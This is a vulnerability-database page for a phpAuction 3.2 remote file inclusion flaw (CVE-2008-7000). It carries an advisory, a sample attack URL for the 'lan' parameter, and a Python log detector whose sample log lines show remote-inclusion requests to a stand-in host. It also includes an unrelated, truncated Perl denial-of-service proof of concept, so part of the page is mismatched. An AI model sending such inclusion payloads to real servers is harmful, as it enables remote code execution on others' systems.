CVE-2008-7000
Published 2009-08-19
Priority: P3 39 high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 2.05% (78.9th percentile)
PHP remote file inclusion vulnerability in index.php in PHPAuction 3.2 allows remote attackers to execute arbitrary PHP code via a URL in the lan parameter. NOTE: this might be related to CVE-2005-2255.1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpauction | phpauction | — | — |
No detection rules found.
Exploit-DB
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
exploitdb·2015-09-06
---
# Exploit Title: [ActiveState] Perl.exe x64 Client Denial of Service (v5.20.2)
# Date: 9-3-2015
# Software Link: http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.20.2.2002/ActivePerl-5.20.2.2002-MSWin32-x64-299195.msi
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target(s): Windows 7, Server 2008, server 2012, Windows 8.1, Windows 10
# CVE:
# Category: Denial of Service Exploits
#
# Description:
# A Denial of Service can be achieved by concatenating several large strings together and attempting to write to file.
my $buff = "\x41" x 7000;
my $endofbuff = "\x42" x 5860;
open(myfile,'>orgsched.ocf'); # file extension is irrelevant
pri
Exploit-DB
phpAuction 3.2 - 'lan' Remote File Inclusion
exploitdb·2009-09-09
CVE-2008-7000 phpAuction 3.2 - 'lan' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/36211/info
phpAuction is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the computer; other attacks are also possible.
phpAuction 3.2 is vulnerable; other versions may also be affected.
http://www.example.com/auction/index.php?lan=Evilshell
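Since no detection rule is indexed for this entry, here is one way to look for the described request pattern in web server logs. This is an added example, not code from the advisory or from phpAuction. It assumes a combined-format access log; the function name, the sample log lines, and the host names and addresses in them are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A language selector should be a short code; a scheme prefix marks a URL or
# PHP stream wrapper (http://, ftp://, php://, data:) handed to the include.
SCHEME = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.I)

def find_lan_inclusion_attempts(lines, script="/index.php", param="lan"):
    """Return (line_number, client, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(script):
            continue
        # parse_qs percent-decodes once, matching what PHP exposes in $_GET.
        for value in parse_qs(target.query, keep_blank_values=True).get(param, []):
            if SCHEME.match(value):
                hits.append((number, line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Sep/2009:10:00:00 +0000] '
    '"GET /auction/index.php?lan=EN HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Sep/2009:10:00:07 +0000] '
    '"GET /auction/index.php?lan=http://files.example.net/a.txt HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Sep/2009:10:00:09 +0000] '
    '"GET /auction/index.php?lan=hTTp%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Sep/2009:10:01:00 +0000] '
    '"GET /auction/browse.php?lan=http://files.example.net/a.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, client, value in find_lan_inclusion_attempts(SAMPLE_LOG):
        print(f"line {number}: {client} sent lan={value!r}")
```

A hit only shows that a URL-like value was sent; whether it was included depends on the server's PHP configuration and the application code.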
No writeups or analysis indexed.
Published: 2009-08-19